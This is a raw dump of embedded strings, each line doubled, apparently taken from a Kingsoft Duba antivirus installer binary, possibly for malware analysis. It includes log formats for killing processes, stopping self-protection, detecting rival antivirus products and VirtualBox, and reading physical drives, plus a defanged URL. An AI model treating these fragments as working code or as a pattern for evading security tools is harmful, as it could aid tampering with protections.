HTTP/1.1 proxy connection set close!
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.0 proxy connection set to keep alive!
HTTP 1.0, assume close after body
HTTP 1.0, assume close after body
RTSP/%d.%d =
RTSP/%d.%d =
HTTP =
HTTP =
HTTP/%d.%d =
HTTP/%d.%d =
Received HTTP code %d from proxy after CONNECT
Received HTTP code %d from proxy after CONNECT
HTTP/1.%d %d
HTTP/1.%d %d
CONNECT %s:%hu HTTP/%s
CONNECT %s:%hu HTTP/%s
%s%s%s%s
%s%s%s%s
Host: %s
Host: %s
%s:%hu
%s:%hu
Establish HTTP proxy tunnel to %s:%hu
Establish HTTP proxy tunnel to %s:%hu
Internal error removing splay node = %d
Internal error removing splay node = %d
Internal error clearing splay node = %d
Internal error clearing splay node = %d
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Failed to resolve "%s" for SOCKS4 connect.
Failed to resolve "%s" for SOCKS4 connect.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 GSSAPI per-message authentication is not supported.
SOCKS5 GSSAPI per-message authentication is not supported.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Failed to resolve "%s" for SOCKS5 connect.
Failed to resolve "%s" for SOCKS5 connect.
User was rejected by the SOCKS5 server (%d %d).
User was rejected by the SOCKS5 server (%d %d).
--:--:--
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
password
password
login
login
Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds
Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds
Unable to parse FTP file list
Unable to parse FTP file list
Error in the SSH layer
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Illegal operation
TFTP: Access Violation
TFTP: Access Violation
TFTP: File Not Found
TFTP: File Not Found
Login denied
Login denied
Issuer check against peer certificate failed
Issuer check against peer certificate failed
Invalid LDAP URL
Invalid LDAP URL
Unrecognized HTTP Content-Encoding
Unrecognized HTTP Content-Encoding
Problem with the SSL CA cert (path? access rights?)
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with known CA certificates
Peer certificate cannot be authenticated with known CA certificates
Problem with the local SSL certificate
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
SSL peer certificate or SSH remote key was not OK
A libcurl function was given a bad argument
A libcurl function was given a bad argument
Operation was aborted by an application callback
Operation was aborted by an application callback
FTP: command REST failed
FTP: command REST failed
FTP: command PORT failed
FTP: command PORT failed
HTTP response code said error
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: The server did not accept the PRET command.
FTP: weird server reply
FTP: weird server reply
URL using bad/illegal format or missing URL
URL using bad/illegal format or missing URL
Unsupported protocol
Unsupported protocol
Winsock version not supported
Winsock version not supported
Protocol family not supported
Protocol family not supported
Address family not supported
Address family not supported
Operation not supported
Operation not supported
Socket is unsupported
Socket is unsupported
Protocol is unsupported
Protocol is unsupported
Protocol option is unsupported
Protocol option is unsupported
Unknown error %d (%#x)
Unknown error %d (%#x)
d:d
d:d
d:d:d
d:d:d
0123456789
0123456789
%c%c==
%c%c==
%c%c%c=
%c%c%c=
%c%c%c%c
%c%c%c%c
.jpeg
.jpeg
.html
.html
--%s--
--%s--
couldn't open file "%s"
couldn't open file "%s"
Content-Type: %s
Content-Type: %s
; filename="%s"
; filename="%s"
Content-Disposition: attachment; filename="%s"
Content-Disposition: attachment; filename="%s"
Content-Type: multipart/mixed, boundary=%s
Content-Type: multipart/mixed, boundary=%s
%s; boundary=%s
%s; boundary=%s
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
g_Install.Init ...
g_Install.Init ...
g_Install.Init return:%d
g_Install.Init return:%d
DbgExtraceAllFiles return:%d
DbgExtraceAllFiles return:%d
import file install need reboot
import file install need reboot
g_Install.StartLoadPacketData
g_Install.StartLoadPacketData
not support cover install in silent mode
not support cover install in silent mode
the old kav version not support cover install
the old kav version not support cover install
ProcessOldProduct RunApp return:%d, file:%ws, cmd:%ws
ProcessOldProduct RunApp return:%d, file:%ws, cmd:%ws
RunAutofix RunApp return:%d
RunAutofix RunApp return:%d
KApp::GetSilentFlag return %d silent:%d
KApp::GetSilentFlag return %d silent:%d
KApp::VersionVerification return %d silent:%d
KApp::VersionVerification return %d silent:%d
0,0,-0,%d
0,0,-0,%d
0,-%d,-0,-0
0,-%d,-0,-0
extern_alpha_key
extern_alpha_key
crtext
crtext
headacceptlbtndownmsg
headacceptlbtndownmsg
0,0,-0,-0
0,0,-0,-0
Kxehost OpenEvent return:%d, error:%d
Kxehost OpenEvent return:%d, error:%d
kill kxetray, failcount:%d, killcount:%d
kill kxetray, failcount:%d, killcount:%d
kill kxetray 2, failcount:%d, killcount:%d
kill kxetray 2, failcount:%d, killcount:%d
StopKxetray return:%d
StopKxetray return:%d
StopService return:%d
StopService return:%d
KFunction::KillProcessByPath failcount:%d, killcount:%d
KFunction::KillProcessByPath failcount:%d, killcount:%d
Wait all progress exit, count:%d
Wait all progress exit, count:%d
Kill services retrun:%d
Kill services retrun:%d
StopService WaitServiceExit return:%d
StopService WaitServiceExit return:%d
StopService WaitServiceExit1 return:%d
StopService WaitServiceExit1 return:%d
ClearBCDriver delete reg return:%d
ClearBCDriver delete reg return:%d
DeleteFile return:%d, error:%d, path:%ws
DeleteFile return:%d, error:%d, path:%ws
KInsall::Is360AvInstalled download fail, file:%ws, nStatus:%d
KInsall::Is360AvInstalled download fail, file:%ws, nStatus:%d
6AES part of OpenSSL 0.9.8c 05 Sep 2006
6AES part of OpenSSL 0.9.8c 05 Sep 2006
User-Agent: Mozilla/4.0
User-Agent: Mozilla/4.0
Authorization: NTLM %s
Authorization: NTLM %s
Proxy-Authorization: NTLM %s
Proxy-Authorization: NTLM %s
%s:xx
%s:xx
# Block type: 2:%x 3:%x
# Block type: 2:%x 3:%x
# DPMS capabilities: Active off:%s Suspend:%s Standby:%s
# DPMS capabilities: Active off:%s Suspend:%s Standby:%s
%d,%d
%d,%d
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
%d ReadPhysicalDriveInNTWithAdminRights ERROR
%d ReadPhysicalDriveInNTWithAdminRights ERROR
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
\\.\IDE21201.VXD
\\.\IDE21201.VXD
\\.\Scsi%d:
\\.\Scsi%d:
Drive%dModelNumber
Drive%dModelNumber
Drive%dSerialNumber
Drive%dSerialNumber
DriveÜontrollerRevisionNumber
DriveÜontrollerRevisionNumber
DriveÜontrollerBufferSize
DriveÜontrollerBufferSize
Drive%dType
Drive%dType
VBoxHook.dll
VBoxHook.dll
\\.\VBoxMiniRdrDN
\\.\VBoxMiniRdrDN
SELECT * FROM Win32_OperatingSystem WHERE (InstallDate IS NOT NULL)
SELECT * FROM Win32_OperatingSystem WHERE (InstallDate IS NOT NULL)
lXXxXXXXXXXX
lXXxXXXXXXXX
XX
XX
xxxxxxxx
xxxxxxxx
KFunction::RunApp CreateProcessW error:%d, wait:%d, show:%d, path:%ws, cmd:%ws
KFunction::RunApp CreateProcessW error:%d, wait:%d, show:%d, path:%ws, cmd:%ws
IsProcessRunningByDirectory CreateFile return:%d, error:%d, path:%ws
IsProcessRunningByDirectory CreateFile return:%d, error:%d, path:%ws
KillProcessByPath CreateToolhelp32Snapshot, error:%d
KillProcessByPath CreateToolhelp32Snapshot, error:%d
%ws:%d
%ws:%d
KillProcessByPath OpenProcess fail, process:%ws, error:%d
KillProcessByPath OpenProcess fail, process:%ws, error:%d
Terminate Process return:%d, error:%d, pid:%d, path:%ws
Terminate Process return:%d, error:%d, pid:%d, path:%ws
StopProcessByPid pid:%d return fase
StopProcessByPid pid:%d return fase
KillProcessByPid TerminateProcess return:%d, error:%d, pid:%d
KillProcessByPid TerminateProcess return:%d, error:%d, pid:%d
KillProcessByCmd taskkill.exe %ws pid:%d return:%d, exitcode:%d, GetLastError:%d
KillProcessByCmd taskkill.exe %ws pid:%d return:%d, exitcode:%d, GetLastError:%d
KillProcessByPathkxescore CreateToolhelp32Snapshot, error:%d
KillProcessByPathkxescore CreateToolhelp32Snapshot, error:%d
KillProcessByPathkxescore OpenProcess fail, process:%ws, error:%d, pid:%d
KillProcessByPathkxescore OpenProcess fail, process:%ws, error:%d, pid:%d
AddPid1 return:%d
AddPid1 return:%d
AddPid1:%d
AddPid1:%d
AddPid2 return:%d
AddPid2 return:%d
AddPid2:%d
AddPid2:%d
StopOldSelfProtect:%d
StopOldSelfProtect:%d
SFP return:%d
SFP return:%d
StopSelfProtect:%d
StopSelfProtect:%d
OLDSFP return:%d
OLDSFP return:%d
KInsall::LenoveOem return:%d
KInsall::LenoveOem return:%d
DeleteUUIDex RecurseDeleteKey :%d
DeleteUUIDex RecurseDeleteKey :%d
DeleteFile hg.dat return:%d
DeleteFile hg.dat return:%d
SetServicesInfo return:%d
SetServicesInfo return:%d
CreateShellLink return:%d, file:%ws, cmd:%ws, link:%ws
CreateShellLink return:%d, file:%ws, cmd:%ws, link:%ws
TerminateProc pid: %d reutrn:%d :dwExitCode: %d
TerminateProc pid: %d reutrn:%d :dwExitCode: %d
KInstallDetect::IsInstallDuba() return:%d
KInstallDetect::IsInstallDuba() return:%d
error_msg
error_msg
bUrlMon
bUrlMon
CmdLine
CmdLine
KGetSilentFlag::GetSilentFlag return %d silentflag:%d
KGetSilentFlag::GetSilentFlag return %d silentflag:%d
KImportFileInstaller::ReleaseFile---begin...
KImportFileInstaller::ReleaseFile---begin...
KImportFileInstaller::ReleaseFile---GetPrivateProfileString failed,strKey = %s
KImportFileInstaller::ReleaseFile---GetPrivateProfileString failed,strKey = %s
KImportFileInstaller::ReleaseFile---Rename failed, %s
KImportFileInstaller::ReleaseFile---Rename failed, %s
KImportFileInstaller::ReleaseFile---end...
KImportFileInstaller::ReleaseFile---end...
KImportFileInstaller::_DisableIntercept---Result = %d
KImportFileInstaller::_DisableIntercept---Result = %d
load product.xml fail
load product.xml fail
found installed product, version:%ws, cover:%d, path:%ws
found installed product, version:%ws, cover:%d, path:%ws
version:%ws, cover:%d
version:%ws, cover:%d
KInsall::IsInstalledKav return:%d
KInsall::IsInstalledKav return:%d
RunApp Register return:%d
RunApp Register return:%d
KInsall::Register return:%d
KInsall::Register return:%d
GetDebugPrivilege return:%d GetLassError return:%d
GetDebugPrivilege return:%d GetLassError return:%d
cover:%d, kxescore:%d
cover:%d, kxescore:%d
StopAllProgress return:%d
StopAllProgress return:%d
ClearWebShield...
ClearWebShield...
ClearWebShield return:%d
ClearWebShield return:%d
install end, return:%d, install cost time:%dms
install end, return:%d, install cost time:%dms
install thread end:%d
install thread end:%d
KInsall::ParseConfig return:%d
KInsall::ParseConfig return:%d
AutoRunkav:%d _ Deleteuuid:%d_lockstartpage:%d
AutoRunkav:%d _ Deleteuuid:%d_lockstartpage:%d
KInsall::ParseKSafe path:%ws, cmd:%ws, wait:%d, show:%d
KInsall::ParseKSafe path:%ws, cmd:%ws, wait:%d, show:%d
KInsall::ParsePCMgr path:%ws, cmd:%ws, wait:%d, show:%d
KInsall::ParsePCMgr path:%ws, cmd:%ws, wait:%d, show:%d
ParsePCMgr return:%d
ParsePCMgr return:%d
KInsall::ParseLaunch path:%ws, cmd:%ws, wait:%d, show:%d
KInsall::ParseLaunch path:%ws, cmd:%ws, wait:%d, show:%d
ParseLaunch return:%d
ParseLaunch return:%d
KInsall::ParseRecommend url:%ws
KInsall::ParseRecommend url:%ws
KSetupWiz::RunClear return:%d
KSetupWiz::RunClear return:%d
KSetupWiz::RunInstall return:%d
KSetupWiz::RunInstall return:%d
install ksafe return:%d
install ksafe return:%d
install pcmgr return:%d
install pcmgr return:%d
IsInstallSuitPacket return:%d
IsInstallSuitPacket return:%d
ClearInvalidDrivers return:%d, error:%d, path:%ws
ClearInvalidDrivers return:%d, error:%d, path:%ws
silent mode detect3 loadUrl return:%d
silent mode detect3 loadUrl return:%d
KInsall::Is360AvInstalled return:%d
KInsall::Is360AvInstalled return:%d
FileName:%ws,param:%ws,waittime:%d bshow:%d
FileName:%ws,param:%ws,waittime:%d bshow:%d
KInsall::FixRegError TestIsVolatieKey(kingsoft) return %d, error:%d
KInsall::FixRegError TestIsVolatieKey(kingsoft) return %d, error:%d
KInsall::FixRegError BackKey(kingsoft) return %d, error:%d
KInsall::FixRegError BackKey(kingsoft) return %d, error:%d
KInsall::FixRegError ImportKey(kingsoft) return %d, error:%d
KInsall::FixRegError ImportKey(kingsoft) return %d, error:%d
KInsall::ParseTidWhiteList tid1:%d, tid2:%d
KInsall::ParseTidWhiteList tid1:%d, tid2:%d
KInsall::ParseTidWhiteList return:%d
KInsall::ParseTidWhiteList return:%d
KInsall::IsInTidWhiteList return:%d
KInsall::IsInTidWhiteList return:%d
LoadProductPacket CreateThread return:%d
LoadProductPacket CreateThread return:%d
ExtractMemoryFiles return:%d
ExtractMemoryFiles return:%d
ExtractPacket return:%d
ExtractPacket return:%d
GetPacketData %d
GetPacketData %d
GetPacketData return:%d
GetPacketData return:%d
Extract return:%d
Extract return:%d
LoadImageToMem CreateFile error:%d, path:%ws
LoadImageToMem CreateFile error:%d, path:%ws
CreateFileByMem CreateFileMapping error:%d, path:%ws
CreateFileByMem CreateFileMapping error:%d, path:%ws
CreateFileByMem MapViewOfFile error:%d, path:%ws
CreateFileByMem MapViewOfFile error:%d, path:%ws
{9B8A9862-3FE6-452e-A096-31E845BF839B}
{9B8A9862-3FE6-452e-A096-31E845BF839B}
Uncompress return:%d
Uncompress return:%d
KSearch::Search product count:%d
KSearch::Search product count:%d
KSearch::Search return:%d
KSearch::Search return:%d
KSearch::ParseConfig return:%d
KSearch::ParseConfig return:%d
KSearch::ReadRegPath wrong root key
KSearch::ReadRegPath wrong root key
KSearch::ReadRegPath Open key fail
KSearch::ReadRegPath Open key fail
KSearch::ReadRegPath Read key fail
KSearch::ReadRegPath Read key fail
ReadRegPath return:%d, root:%ws, path:%ws, name:%ws
ReadRegPath return:%d, root:%ws, path:%ws, name:%ws
IsFileListExist return not exist, error:%d, path:%ws
IsFileListExist return not exist, error:%d, path:%ws
g_App.Run...
g_App.Run...
g_App.Run return:%d
g_App.Run return:%d
GetExportInterface
GetExportInterface
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
KFixAV DeleteSubKeyTree %ws return:%d
KFixAV DeleteSubKeyTree %ws return:%d
FilterBlack() DeleteSubKeyTree %ws %ws
FilterBlack() DeleteSubKeyTree %ws %ws
FixPolicies return:%d
FixPolicies return:%d
%d-%d-%d d:d:d d
%d-%d-%d d:d:d d
particle%d
particle%d
notifymsg
notifymsg
SendHttpRequestEx
SendHttpRequestEx
bubble%d
bubble%d
OnInstallProgress nProgress:%d, m_nProgressCount:%d
OnInstallProgress nProgress:%d, m_nProgressCount:%d
137,269,199,285
137,269,199,285
62,269,124,285
62,269,124,285
22,9,262,24
22,9,262,24
KUninstall360Dlg::CallInfoc reported:%s %s
KUninstall360Dlg::CallInfoc reported:%s %s
KUninstall360GuideDlg::ReportInfo reported:%s %s
KUninstall360GuideDlg::ReportInfo reported:%s %s
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
MoveFileEx Rename file fail, error:%d
MoveFileEx Rename file fail, error:%d
CreateFile:%d
CreateFile:%d
CreateFileByMem CreateFile error:%d, path:%ws
CreateFileByMem CreateFile error:%d, path:%ws
CreateFileMapping:%d
CreateFileMapping:%d
MapViewOfFile:%d
MapViewOfFile:%d
ChecksumFileByMem return%d, path:%ws
ChecksumFileByMem return%d, path:%ws
ChecksumFileByMem CreateFile error:%d, path:%ws
ChecksumFileByMem CreateFile error:%d, path:%ws
ChecksumFileByMem CreateFileMapping error:%d, path:%ws
ChecksumFileByMem CreateFileMapping error:%d, path:%ws
ChecksumFileByMem MapViewOfFile error:%d, path:%ws
ChecksumFileByMem MapViewOfFile error:%d, path:%ws
ReportV2 ...
ReportV2 ...
ReportV2 end
ReportV2 end
ReportOtherInfo ...
ReportOtherInfo ...
ReportOtherInfo end
ReportOtherInfo end
ReportLiebaoRcmd ...
ReportLiebaoRcmd ...
ReportLiebaoRcmd end
ReportLiebaoRcmd end
ReportImportFileInstall ...
ReportImportFileInstall ...
ReportImportFileInstall end
ReportImportFileInstall end
ReportV2BJ ...
ReportV2BJ ...
ReportV2BJ end
ReportV2BJ end
ReportParentProcessInfo ...
ReportParentProcessInfo ...
ReportParentProcessInfo end
ReportParentProcessInfo end
DeleteSubKeyTree root:%d, path:%ws
DeleteSubKeyTree root:%d, path:%ws
DeleteSubKeyTree return:%d
DeleteSubKeyTree return:%d
KExecReg Run Return:%d, delete:%d, root:0x%x, path:%ws, type:%d, name:%ws, value:%ws
KExecReg Run Return:%d, delete:%d, root:0x%x, path:%ws, type:%d, name:%ws, value:%ws
KExecProcess Run, path:%ws, cmd:%ws, time:%d, show:%d
KExecProcess Run, path:%ws, cmd:%ws, time:%d, show:%d
KExecProcessRun return:%d
KExecProcessRun return:%d
KExecService Run operation:%d
KExecService Run operation:%d
KxEInstallService return:%d, path:%ws
KxEInstallService return:%d, path:%ws
KxEUninstallService return:%d, name:%ws
KxEUninstallService return:%d, name:%ws
KxEStartService return:%d, name:%ws
KxEStartService return:%d, name:%ws
KxEStopService return:%d, name:%ws
KxEStopService return:%d, name:%ws
KExecService Run return:%d
KExecService Run return:%d
KExecFile DeleteFile return:%d, error:%d, path:%ws
KExecFile DeleteFile return:%d, error:%d, path:%ws
KExecLink DeleteFolder return:%d, path:%ws
KExecLink DeleteFolder return:%d, path:%ws
KExecLink DeleteFile return:%d, error:%d, path:%ws
KExecLink DeleteFile return:%d, error:%d, path:%ws
KExecLink CreateLink return:%d, file:%ws, cmd:%ws, link:%ws
KExecLink CreateLink return:%d, file:%ws, cmd:%ws, link:%ws
CreateExecReg fail
CreateExecReg fail
CreateExecService fail
CreateExecService fail
CreateExecProcess fail
CreateExecProcess fail
CreateExecLink fail
CreateExecLink fail
KInstaller::ParseInstall return:%d
KInstaller::ParseInstall return:%d
KInstaller::ParseCoverInstall return:%d
KInstaller::ParseCoverInstall return:%d
KInstaller::Install return:%d
KInstaller::Install return:%d
KInstaller::Start return:%d
KInstaller::Start return:%d
KInstaller::CoverInstall return:%d
KInstaller::CoverInstall return:%d
ModifyFolderIcon _tfopen fail, error:%d
ModifyFolderIcon _tfopen fail, error:%d
CreateExecFile fail
CreateExecFile fail
KClear::Clean return:%d
KClear::Clean return:%d
WinHttpOpen
WinHttpOpen
WinHttpConnect
WinHttpConnect
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpReadData
WinHttpReadData
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpSetOption
WinHttpSetOption
WinHttpSetTimeouts
WinHttpSetTimeouts
FindAV2012:%d
FindAV2012:%d
C:\drv.pdb
C:\drv.pdb
%s\Connection
%s\Connection
e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kpacket.pdb
e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kpacket.pdb
GdiplusShutdown
GdiplusShutdown
zcÃ
zcÃ
.?AV?$CWindowImpl@VKNewMsgbox@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@3@@ATL@@
.?AV?$CWindowImpl@VKNewMsgbox@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@3@@ATL@@
.?AV?$CBkDialogImpl@VKNewMsgbox@@VCBkDialogView@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@4@@@
.?AV?$CBkDialogImpl@VKNewMsgbox@@VCBkDialogView@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@4@@@
.?AVKNewMsgbox@@
.?AVKNewMsgbox@@
.?AV?$KxEIPCClientT@VIKxEServiceMgr@@VKxEPipeClientCommunication@@@@
.?AV?$KxEIPCClientT@VIKxEServiceMgr@@VKxEPipeClientCommunication@@@@
.?AV?$KxEPipeClientT@VIKxEServiceMgr@@@@
.?AV?$KxEPipeClientT@VIKxEServiceMgr@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineSP_old@@VKxEPipeClientCommunication@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineSP_old@@VKxEPipeClientCommunication@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineSP_old@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineSP_old@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineTrustSP@@VKxEPipeClientCommunication@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineTrustSP@@VKxEPipeClientCommunication@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineTrustSP@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineTrustSP@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineSP@@VKxEPipeClientCommunication@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineSP@@VKxEPipeClientCommunication@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineSP@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineSP@@@@
.?AV?$CAtlHttpClientT@VZEvtSyncSocket@ATL@@@ATL@@
.?AV?$CAtlHttpClientT@VZEvtSyncSocket@ATL@@@ATL@@
.?AVKInstallStageReport@KDubaPacket@@
.?AVKInstallStageReport@KDubaPacket@@
.?AVCKANRegisterKey@@
.?AVCKANRegisterKey@@
.?AVKWriteHttpFile@@
.?AVKWriteHttpFile@@
.?AV?$CWindowImpl@VCBkMsgWnd@@VCWindow@ATL@@V?$CWinTraits@$0GMPAAAA@$0EABAA@@3@@ATL@@
.?AV?$CWindowImpl@VCBkMsgWnd@@VCWindow@ATL@@V?$CWinTraits@$0GMPAAAA@$0EABAA@@3@@ATL@@
.?AVCBkMsgWnd@@
.?AVCBkMsgWnd@@
.?AVIProcessMsgBack@@
.?AVIProcessMsgBack@@
.?AVCBkWindowScollBar@@
.?AVCBkWindowScollBar@@
.?AUICryptoSetPassword@@
.?AUICryptoSetPassword@@
.?AVCCryptoGetTextPassword@N7z@NArchive@@
.?AVCCryptoGetTextPassword@N7z@NArchive@@
.?AUICryptoGetTextPassword@@
.?AUICryptoGetTextPassword@@
.?AVKImportFileInstallBlock@KDubaPacket@@
.?AVKImportFileInstallBlock@KDubaPacket@@
.?AVKExecLink@@
.?AVKExecLink@@
.?AVKExecFile@@
.?AVKExecFile@@
.?AVKExecService@@
.?AVKExecService@@
.?AVKExecProcess@@
.?AVKExecProcess@@
.?AVKExecReg@@
.?AVKExecReg@@
.?AVIExec@@
.?AVIExec@@
.?AVKWriteMemHttpFile@@
.?AVKWriteMemHttpFile@@
.?AVKUnionInfocReporter@anti_cheat@@
.?AVKUnionInfocReporter@anti_cheat@@
|:S.ww
|:S.ww
0eW`%f
0eW`%f
%Xr01
%Xr01
4.vsX\
4.vsX\
r.dwpt
r.dwpt
%x@!X
%x@!X
#iTXtXML:com.adobe.xmp
#iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> 4o
" id="W5M0MpCehiHzreSzNTczkc9d"?> 4o
" id="W5M0MpCehiHzreSzNTczkc9d"?> 9S/
" id="W5M0MpCehiHzreSzNTczkc9d"?> 9S/
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
ddd
ddd
ressrc\chs\uplive.svr
ressrc\chs\uplive.svr
hXXp://ct.duba.net/s/ut/
hXXp://ct.duba.net/s/ut/
avp.exe
avp.exe
ffcert.exe
ffcert.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{560985FB-4B76-4121-9189-7A2CDC7886D6}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{560985FB-4B76-4121-9189-7A2CDC7886D6}
avscan.exe
avscan.exe
avcenter.exe
avcenter.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Avira AntiVir Desktop
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Avira AntiVir Desktop
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
kautofix.exe
kautofix.exe
L%d-%d-%d:%d-%d
L%d-%d-%d:%d-%d
%s %s
%s %s
comctl32.dll
comctl32.dll
%s\%d.bmp
%s\%d.bmp
%s\%d.%s
%s\%d.%s
msyh.ttf
msyh.ttf
simsun.ttc
simsun.ttc
SimSun.ttc
SimSun.ttc
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
msimg32.dll
msimg32.dll
gdata\skin\skincfg.ini
gdata\skin\skincfg.ini
tuxtheme.dll
tuxtheme.dll
%d%%%s
%d%%%s
Akscan.exe
Akscan.exe
kxesapp.exe
kxesapp.exe
kxedefend.exe
kxedefend.exe
kxescore.exe
